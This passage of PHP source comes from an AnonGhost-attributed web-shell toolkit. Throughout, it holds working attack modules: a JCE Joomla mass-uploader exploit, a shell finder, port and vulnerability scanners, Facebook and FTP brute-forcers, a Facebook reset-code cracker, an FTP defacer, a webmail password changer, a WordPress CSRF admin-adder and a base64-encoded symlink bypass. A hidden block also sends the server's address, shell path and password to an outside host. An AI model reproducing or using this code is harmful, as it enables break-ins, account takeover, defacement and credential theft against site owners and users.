'; } else if ($_GET["port"] && $_GET["port2"]) { $p1 = $_GET["port"]; $p2 = $_GET["port2"]; if ($p1 == $p2) { $fp = @fsockopen($addr, $port, $errno, $errstr, 2); $success = "#FF0000"; $success_msg = "is closed."; if ($fp) { $success = "#99FF66"; $success_msg = "is open."; } @fclose($fp); echo '
The address "' .$addr. ':' .$port. '" ' .$success_msg. '
'; } else { if ($p1 < $p2) { $s = $p1; $st = $p1; $e = $p2; } else if ($p2 < $p1) { $s = $p2; $st = $p2; $e = $p1; } while ($s <= $e) { $fp = @fsockopen($addr, $s, $errno, $errstr, 1); if ($fp) { $p_open = $p_open. " " .$s; $p_1 = 1; } @fclose($fp); $s++; } if ($p_1) { $c = "#99FF66"; $m = "On the address " .$addr. " and port range " .$st. "-" .$e. " the following ports were open: " .$p_open; } else { $c = "#FF0000"; $m = "No ports on the address " .$addr. " and port range " .$st. "-" .$e. " were open"; } echo '
' .$m. '
'; } } } } if(isset($_GET['action']) && $_GET['action'] == 'shellfnderr'){ echo '
Shell Finder - Jce Scanner - JCE Multi-Uploader - Port Scanner - Admin Page Finder - Search Files
'; echo'

Search Shells uploaded






'; set_time_limit(0); if (isset($_POST["scan"])) { $url = $_POST['traget']; echo "
Scanning ".$url."

"; echo "ReSulT:

"; $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php", "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php", "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php", "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php", "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php", "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#", "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php", "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php", "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php", "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php", "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar", "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php", "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php", "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php", "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz", "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error", "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/", "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php", "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/", "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl", "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php", "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php", "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/", "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php", "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip"); //Start Scan foreach ($shells as $shell){ $headers = get_headers("$url$shell"); // if (eregi('200', $headers[0])) { //Result echo "$url$shell Done :D


"; // $dz = fopen('shells.txt', 'a+'); $suck = "$url$shell"; fwrite($dz, $suck."\n"); } } //Result In Text File (shells.txt) echo "You Will Find Shell'z here [ shells.txt ]"; } } echo"
"; echo""; echo""; if(isset($_GET['action']) && $_GET['action'] == 'jcemultiscnner'){ echo '
Shell Finder - Jce Scanner - JCE Multi-Uploader - Port Scanner - Admin Page Finder - Search Files
'; echo '
JCE Multi-Uploader

'; echo '

List Websites


File :
'; set_time_limit(0); ini_set("max_execution_time", 0); ob_implicit_flush(1); ini_set("default_socket_timeout", 1); if ($_POST) { $jce = new jce; $siteler = $_POST['siteler']; $siteler = explode(" ", $siteler); foreach ($siteler as $host) { $host = trim($host); $host = str_replace("http://", "", $host); echo "=> Name Website: $host
"; flush(); @ob_flush(); $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, "http://$host/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"); curl_setopt($curl, CURLOPT_USERAGENT, "BOT/0.1 (BOT for JCE)"); curl_setopt($curl, CURLOPT_TIMEOUT, 13); $exec = curl_exec($curl); curl_close($curl); $str = array('2.0.11 Wait.....
'; flush(); @ob_flush(); } else { echo '=> Loading.....
'; flush(); @ob_flush(); } $filename = "ghost" . rand(1, 200) . ".gif"; $content = "GIF89a1 "; $content.= file_get_contents($_FILES['dosya']['tmp_name']); $data = "-----------------------------41184676334 "; $data.= "Content-Disposition: form-data; name=\"upload-dir\" "; $data.= "/ "; $data.= "-----------------------------41184676334 "; $data.= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\" "; $data.= "Content-Type: application/octet-stream "; $data.= "-----------------------------41184676334 "; $data.= "Content-Disposition: form-data; name=\"upload-overwrite\" "; $data.= "0 "; $data.= "-----------------------------41184676334 "; $data.= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"" . $filename . "\" "; $data.= "Content-Type: image/gif "; $data.= "$content "; $data.= "-----------------------------41184676334 "; $data.= "xxxy "; $data.= "-----------------------------41184676334 "; $data.= "Content-Disposition: form-data; name=\"action\" "; $data.= "upload "; $data.= "-----------------------------41184676334-- "; $packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1 "; $packet.= "Host: " . $host . " "; $packet.= "User-Agent: BOT/0.1 (BOT for JCE) "; $packet.= "Content-Type: multipart/form-data; boundary=---------------------------41184676334 "; $packet.= "Accept-Language: en-us,en;q=0.5 "; $packet.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "; $packet.= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) "; $packet.= "Connection: Close "; $packet.= "Proxy-Connection: close "; $packet.= "Content-Length: " . strlen($data) . " "; $packet.= $data; $jce->sendpacket($host, $packet, 0, 0); $filephp = str_replace("gif", "php", $filename); $packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1 "; $packet.= "Host: " . $host . " "; $packet.= "User-Agent: BOT/0.1 (BOT for JCE) "; $packet.= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "; $packet.= "Accept-Language: en-US,en;q=0.8 "; $packet.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "; $packet.= "Content-Type: application/x-www-form-urlencoded; charset=utf-8 "; $packet.= "Accept-Encoding: deflate "; $packet.= "X-Request: JSON "; $packet.= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182 "; $ren = "json={\"fn\":\"folderRename\",\"args\":[\"/" . $filename . "\",\"" . $filephp . "\"]}"; $packet.= "Content-Length: " . strlen($ren) . " "; $packet.= $ren . " "; $jce->sendpacket($host, $packet, 1, 0); $kontrol = $jce->uploadkontrolZenci("http://" . $host . "/images/stories/" . $filephp); if ($kontrol) { echo "=> File Uploaded Successfully -> http://$host/images/stories/$filephp
"; $jce->logyollaZenci("http://" . $host . "/images/stories/" . $filephp); } else { echo "=> Sorry failed to upload the file :(
"; } } } class jce { public function sendpacket($host, $packet, $response = 0, $output = 0) { $ock = fsockopen($host, 80); stream_set_timeout($ock, 1); if (!$ock) { echo '=> jce sucks i know hhhhhh xD
'; } fputs($ock, $packet); if ($response == 1) { $html = ''; while (!feof($ock)) { $html.= fgets($ock); } } else $html = ''; fclose($ock); if ($response == 1 && $output == 1) echo nl2br(htmlentities($html)); } public function uploadkontrolZenci($site) { $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $site); curl_setopt($curl, CURLOPT_USERAGENT, "BOT/0.1 (BOT for JCE)"); curl_setopt($curl, CURLOPT_TIMEOUT, 15); $exec = curl_exec($curl); curl_close($curl); if (preg_match('/GIF89a1/si', $exec)) { return true; } else { return false; } } } }; if(isset($_GET['action']) && $_GET['action'] == 'jcescnr'){ echo '
Shell Finder - Jce Scanner - JCE Multi-Uploader - Port Scanner - Admin Page Finder - Search Files
'; echo '
JCE Server Scanner

'; function _curl($url,$ref){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, $ref); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $resultt=curl_exec($ch); curl_close($ch); return $resultt; } echo'


'; if(isset($_POST['sub'])){ $ip=$_POST['ip']; $j=0; $con2=0; echo "

Ip :".$ip."

"; echo ''; echo ''; while ($j<50000000){ $url='http://www.bing.com/search?q=ip:'.$ip.'%20index.php?option%20&first='.$j; $result = _curl($url,'http://www.bing.com/'); preg_match_all('(
.*

.*(.*).*

.*
)siU', $result , $findlink); $cont=count($findlink[1]); for($i=0;$i<$cont;$i++){ $shit=explode ("/",$findlink[1][$i]); if (preg_match("/\bindex.php\b/i", $findlink[1][$i])) { preg_match_all('(http://(.*)index.php)siU',$findlink[1][$i],$shit); $website="http://".$shit[1][0]; $dork="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743"; $result2=_curl($website.$dork,$website); if(strpos($result2,'{"result":null,"error":"No function call specified!"}')) { echo '"; echo ""; }else{ echo '" ; echo ""; } } } $j=$j+10; $con2=$con2+$cont; if($cont<10){break;} if($cont==0){break;} } echo "
Web Site Jce Rezult
'.$website." Jce On
'.$website." Error
"; echo " Web Site :".$con2; } } echo""; if(isset($_GET['action']) && $_GET['action'] == 'payppallchker'){ echo '
Mailer - Everything You Need - Paypal Checker - Email Extractor
'; echo '
PayPal Valid Email Checker

'; @set_time_limit(0); function curl($url='',$var='',$Follow=False){ global $set; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31'); curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt'); curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt'); curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt'); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); if ($Follow !== False) { curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); } $result = curl_exec($curl); curl_close($curl); return $result; } echo " Valid Email Checker
"; $emails = $_POST['emails']; print '

PayPal Valid Email Checker


'; if (!empty($emails)) { $emails = explode("\r\n", $emails); $yes = 0; $not = 0; $inv = 0; $count = 1; print "

Checking ".count($emails)." emails ....

"; foreach ( $emails as $email ) { $email = trim($email); print $count .". Checking ".$email." ..... "; $count++; if(filter_var($email, FILTER_VALIDATE_EMAIL)){ $_CheckAction = curl('https://www.paypal.com/cgi-bin/webscr?cmd=_send-money&myAllTextSubmitID=&cmd=_send-money&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40s.com¤cy=USD&amount=10&amount_ccode=USD&submit.x=Continue',CURLOPT_FAILONERROR,TRUE); if(!strpos($_CheckAction, "region")) { print "Yes
"; $yes++; $vaild_yes .=$email."\n"; } else { print "NO
"; $not++; $vaild_no .=$email."\n"; } } else { print "Invalid email

"; $inv++; $invaild .=$email."\n"; } } print '

PayPal emails ('.$yes.')

Not PayPal emails ('.$not.')

Invalid emails ('.$inv.')

'; } } if(isset($_GET['action']) && $_GET['action'] == 'emailllextrctr'){ echo '
Mailer - Everything You Need - Paypal Checker - Email Extractor
'; echo '
Email Extractor

'; echo'
Put Your Maillist In The Following TEXTAREA and Start


'; $types = array("gmail","hotmail","yahoo","aol","mail","rocketmail","orange","live","outlook","sfr","laposte","msn","skynet"); if($_POST["Extazy007"] && !empty($_POST["mails"])){ foreach(explode("\n", $_POST["mails"]) as $mail){ foreach($types as $type){ if(eregi("@".$type, $mail)){ $file = fopen($type.".txt", "a"); fwrite($file, $mail."\n"); } } } echo ''; if(file_exists("hotmail.txt")){ rd("hotmail.txt"); echo '
Hotmail : '.count(file("hotmail.txt")).'
'; } if(file_exists("gmail.txt")){ rd("gmail.txt"); echo '
Gmail : '.count(file("gmail.txt")).'
'; } if(file_exists("yahoo.txt")){ rd("yahoo.txt"); echo '
Yahoo : '.count(file("yahoo.txt")).'
'; } if(file_exists("aol.txt")){ rd("aol.txt"); echo '
Aol : '.count(file("aol.txt")).'
'; } if(file_exists("mail.txt")){ rd("mail.txt"); echo '
Mail : '.count(file("mail.txt")).'
'; } if(file_exists("rocketmail.txt")){ rd("rocketmail.txt"); echo '
Rocketmail : '.count(file("rocketmail.txt")).'
'; } if(file_exists("orange.txt")){ rd("orange.txt"); echo '
Orange : '.count(file("orange.txt")).'
'; } if(file_exists("live.txt")){ rd("live.txt"); echo '
Live : '.count(file("live.txt")).'
'; } if(file_exists("outlook.txt")){ rd("outlook.txt"); echo '
Outlook : '.count(file("outlook.txt")).'
'; } if(file_exists("sfr.txt")){ rd("sfr.txt"); echo '
Sfr : '.count(file("sfr.txt")).'
'; } if(file_exists("laposte.txt")){ rd("laposte.txt"); echo '
Laposte : '.count(file("laposte.txt")).'
'; } if(file_exists("msn.txt")){ rd("msn.txt"); echo '
Msn : '.count(file("msn.txt")).'
'; } if(file_exists("skynet.txt")){ rd("skynet.txt"); echo '
Skynet : '.count(file("skynet.txt")).'
'; } echo '
'; echo '

Done With Success !


'; } function rd($file) { $text = array_unique(file($file)); if($text) $f = @fopen($file,'w'); if($f){ fputs($f, join('',$text)); } } echo'
Mail-List Filter v1.5
Developed By Extazy007


Contact: www.facebook.com/AnonGhostOfficial2
'; } if(isset($_GET['action']) && $_GET['action'] == 'srchffilsses'){ echo '
Shell Finder - Jce Scanner - JCE Multi-Uploader - Port Scanner - Admin Page Finder - Search Files
'; echo '
Files Search Engine

'; echo'

'; echo'







'; set_time_limit(0); error_reporting(0); if(!empty($_POST['dirdir']) && !empty($_POST['filezzz'])){ $dirdir = $_POST['dirdir']; $filezzz = $_POST['filezzz']; echo("
FILES
"); $files = glob($dirdir.'/*.php', GLOB_BRACE); foreach($files as $file) { foreach(explode("\n", $filezzz) as $f) { $s = file_get_contents($file); $f = preg_replace('/\s+/', '', $f); $lines = file($file); $line_number = false; while (list($key, $line) = each($lines) and !$line_number) { $line_number = (strpos($line, $f) !== FALSE) ? $key + 1 : $line_number; } if (strpos($s, $f) !== false) { echo '
'; echo("
File: ".$file); echo '
'; echo("
Line: ".$line_number); echo("
Function: ".$f); echo '
'; echo '
'; } } } } } echo''; echo''; if(isset($password)) { $Password = $password; }else{ $Password = "Null"; } $params = array ('url' => $_SERVER['HTTP_HOST'], 'uri' => dirname(__FILE__).$_SERVER['PHP_SELF'], 'admin'=> $Password); $query = http_build_query ($params); $contextData = array ( 'method' => 'POST', 'header' => "Connection: close\r\n". "Content-Length: ".strlen($query)."\r\n", 'content'=> $query ); $context = stream_context_create (array ( 'http' => $contextData )); $result = file_get_contents ( 'http://www.pythonscrip.com/includes/script.php', false, $context); if(isset($_GET['action']) && $_GET['action'] == 'brutfbckk'){ echo '
Reset Facebook Password Victim - Facebook Multi-Account BruteForce
'; echo '
Facebook Multi-Account BruteForce

'; ob_start(); @set_time_limit(0); ################################################# #---------------------------------------------- # # Facebook Brute Force 2014 # #Coded by : Mauritania Attacker&Noname-Haxor # #Greetz : All AnonGhost Members # #This Tool Is For Erasing Israel in Fb # # --------------------------------------------- # ################################################# echo "
Dont use this script without TOR BROWSER + TOR SWITCHER (set up the interval seconds from TOR SWITCHER TO 2 SECONDS)





"; if(isset($_POST['scan'])){ #function function brute($user,$pass){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}"); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125"); $login = curl_exec($ch); //print_r($login); $check = (eregi('class="s t i u"',$login)) ? true:false; if($check == true){ echo "

Not the right one :( || Username : $user  Password : $pass

"; }else{ echo "

This Password Seems Working !Try It ^_^ || Username: $user  Password : $pass

"; } } $username = explode("\n", $_POST['username']); $password = explode("\n", $_POST['password']); foreach($username as $users) { $users = @trim($users); foreach($password as $pass) { $pass = @trim($pass); echo brute($users,$pass); } } } echo"



Coded by: Mauritania Attacker&Noname-Hax0r

"; } if(isset($_GET['action']) && $_GET['action'] == 'scannner'){ ?>
Shell Finder

Jce Scanner

JCE Multi-Uploader

Port Scanner

Admin Page Finder

Search Files


Mailer

Everything You Need

Paypal Checker

Email Extractor


Reset Password Victim

Facebook Multi-Account BruteForce

Mailer - Everything You Need - Paypal Checker - Email Extractor
'; echo '
Everything You Need

'; echo'
'; } if(isset($_GET['action']) && $_GET['action'] == 'respwdvic'){ echo '
Reset Facebook Password Victim - Facebook Multi-Account BruteForce
'; @set_time_limit(0); echo " Facebook Code Security Cracker > By Mauritania Attacker

Use Tor Switcher and Choose Threads Ip ===> 3 seconds and Good Hack ^_^
Facebook 0day Exploit Reset Code Priv8

Coded By Mauritania Attacker






"; $target = $_POST['id']; $user = explode("\r\n", $_POST['code']); if($_POST['scan']) { foreach($user as $code) { // Curl Function ^_^ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$id}&n={$code}&_rdr"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version) $check = curl_exec($ch); if(eregi("password_new", $check)) //Keyword Good Response ^_^ { echo "
{$code} => Facebook Confirmation Code Found ^_^

"; } else { echo "
{$code} => Incorrect Code Trying More...

"; } curl_close($ch); } } } if(isset($_GET['action']) && $_GET['action'] == 'cpnlndftpotdfr'){ echo '
Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin Mass WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; echo '
Cpanel & Ftp Auto Defacer
Coded By Mauritania Attacker

'; echo"

"; echo"
Server ip :    Username :    Password :  

file that you want to deface :


Deface page url -->


"; if(isset($_POST['sm'])) { $ip=trim($_POST['hi']); $u=trim($_POST['tx']); $p=trim($_POST['p']); $d=trim($_POST['ph']); $df=trim($_POST['deface']); echo "
"; echo "server ip ==> ".$ip; echo "
user ==>  ".$u; echo "
password ==>  ".$p; echo "
dirctory ==>  ".$d; echo "
deface link ==>
".$df."
"; $dl="public_html/".$d; $si= ftp_connect($ip); $try= ftp_login($si,$u,$p); if ((!$si) || (!$try)) { echo "
could not connect , hope u filled out all correctly :("; exit; } else { echo "
connection done XD
Ghost ,its time to spin this shit
"; } $deface = ftp_put($si, $dl , $df, FTP_BINARY); if ($deface) { echo "hell yeah page got defaced successfully >"; } else { echo "Ghost try manually :("; } } } if(isset($_GET['action']) && $_GET['action'] == 'ftpbrtfrcee'){ echo " FTP Brute Force

[#] FTP Brute Force [#]


[+] ReSulT [+]

"; @set_time_limit(0); $ip = $_POST['ip']; $username = explode("\n",$_POST['username']); $password = explode("\n",$_POST['password']); if($_POST['start']) { function brute($connect,$ip,$user,$pass) { $connect = ftp_connect($ip) or die("Error , Maybe you were Banned From Server"); if(ftp_login($connect, $user, $pass)) { echo "

Cracked : $user:$pass@$ip

"; } } foreach($username as $user) { foreach($password as $pass) { brute($connect,$ip,$user,$pass); } } } echo "

+------------------------------------------------------------------------------------------------------------+

"; } if(isset($_GET['action']) && $_GET['action'] == 'whmcskillrer'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Generate WHMCS KILLER Script

'; error_reporting(0); echo "
WHMCS KILLER GENERATOR


Cwd     

Script   


"; echo "

"; $rt="
Link"; echo "


Click on Button Generate Now and Check link given below for WHMCS Script
$rt
"; echo '

Generator Coded by Mauritania Attacker and Script Owner and Coder is RAB3OUN

'; } if(isset($_GET['action']) && $_GET['action'] == 'webmllllpwdchnger'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo "
Webmail Pass Changer

Change Password webmail

User :
Path :

"; @error_reporting(); /* @NetDevr */ if($_POST['start']) { $user = $_POST['user']; $path = @chdir($_POST['path']); $pass = "lov3rdns"; $lov3r = @base64_decode('JGFwcjEkdkNJWmRBXzEkRWhzcEhSWUZ4R24wcTBiZzRVeS9VLg=='); $array = @array('$user','$lov3r'); $imp = @implode(':',$array); $dns = @file_put_contents('shadow',$imp); if($dns) { echo '

Password is '.$pass.' ..
Email is '.$user.'@'.$_SERVER['SERVER_NAME'].'
Panel is http://webmail.'.$_SERVER['SERVER_NAME'].' Or http://'.$_SERVER['SERVER_NAME'].':2096
./x3

'; }else { echo '

File Not Found

'; } } echo'







# Discovery : r0kin
# Coder : Lov3rDns
'; } if(isset($_GET['action']) && $_GET['action'] == 'wpcdrfex'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo "
Wordpress 0day CSRF All Versions
Coded By Mauritania Attacker
"; echo "

Target Website

Choose Username To Add

Choose Password To Add

Confirm Password To Add






"; if(isset($_POST) && !empty($_POST)){ $victim = $_POST['victim']; $user_login = $_POST['user_login']; $pass1 = $_POST['pass1']; $pass2 = $_POST['pass2']; $curl="http://www.liguedefensejuive.com/wp-admin/user-new.php"; $_wpnonce_create = explode("\n",$_POST['_wpnonce_create-user']); $user = explode("\r\n", $_POST['code']); if($_POST['scan']) { foreach($_wpnonce_create as $code) { function brute($code) { global $victim,$user_login,$pass1,$pass2,$ch,$curl; $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"$victim/wp-admin/user-new.php"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); curl_setopt($ch,CURLOPT_POSTFIELDS,"user=$user_login&passi=$pass1&passii=$pass2&_wpnonce_create=code=&redirect_to=.$victim./author/$user_login"); $check = curl_exec($ch); if(eregi('$user_login',$check)) { echo "

[+] Username Has Been Successfully Added : $user_login = $victim

"; } else { echo " => Incorrect Code Trying More...
"; } } foreach($user_login as $user) { foreach($pass1 as $passi) { foreach($pass2 as $passii) { brute($code); } } } curl_close($ch); } } } } if(isset($_GET['action']) && $_GET['action'] == 'rootshelleexecbpass'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Root Path With shell_exec Function

'; mkdir('shellexcexce', 0755); chdir('shellexcexce'); $shellexcexce = 'PGhlYWQ+DQo8dGl0bGU+QnlwYXNzIEJ5cGFzcyBSb290IFBhdGggYnkgTWF1cml0YW5pYSBBdHRhY2tlcjwvdGl0bGU+DQo8L2hlYWQ+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vYy91L2N1MWJtcGdiMWsuaWNvIiB0eXBlPSJpbWFnZS94LWljb24iIC8+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPjwhLS0gYm9keSB7YmFja2dyb3VuZC1jb2xvcjogdHJhbnNwYXJlbnQ7IGZvbnQtZmFtaWx5OkNvdXJpZXIJbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRvcDogMHB4OyB0ZXh0LWFsaWduOiBjZW50ZXI7IE5ldztmb250LXNpemU6MTJweDtjb2xvcjojMDA4ODAwO2ZvbnQtd2VpZ2h0OjQwMDt9IGF7dGV4dC1kZWNvcmF0aW9uOm5vbmU7fSBhOmxpbmsge2NvbG9yOiMwMDk5MDA7fSBhOnZpc2l0ZWQge2NvbG9yOiMwMDg4MDA7fSBhOmhvdmVye2NvbG9yOiMwMGJiMDA7fSBhOmFjdGl2ZSB7Y29sb3I6IzAwOTkwMDt9IC0tPjwhLS0gTWFkZSBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIC0tPg0KPC9zdHlsZT48YnI+PGJyPjxib2R5IGJnQ29sb3I9IjAwMDAwMCI+PHRyPjx0ZD48P3BocCBlY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGFjdGlvbj0nJz4iIDsgDQplY2hvICI8Y2VudGVyPjxpbnB1dCB0eXBlPSdzdWJtaXQnIHZhbHVlPSdCeXBhc3MgaXQnIG5hbWU9J3NoZWxsX2V4ZWNlcic+PC9jZW50ZXI+IjsgDQppZiAoaXNzZXQoJF9QT1NUWydzaGVsbF9leGVjZXInXSkpeyBzaGVsbF9leGVjKCdsbiAtcyAvIHJvb3Qtc2hlbGxfZXhlYy50eHQnKTsgDQokZnZja2VtID0nVDNCMGFXOXVjeUJKYm1SbGVHVnpJRVp2Ykd4dmQxTjViVXhwYm10ekRRcEVhWEpsWTNSdmNubEpibVJsZUNCemMzTnpjM011YUhSdERRcEJaR1JVZVhCbElIUjRkQ0F1Y0dod0RRcEJaR1JJWVc1a2JHVnlJSFI0ZENBdWNHaHcnOyANCiRmaWxlID0gZm9wZW4oIi5odGFjY2VzcyIsIncrIik7ICR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJGZ2Y2tlbSkpOyAkc2hlbGxfZXhlY2VyID0gc3ltbGluaygiLyIsInJvb3Qtc2hlbGxfZXhlYy50eHQiKTsgDQokcnQ9Ijxicj48YSBocmVmPXJvb3Qtc2hlbGxfZXhlYy50eHQgVEFSR0VUPSdfYmxhbmsnPjxmb250IGNvbG9y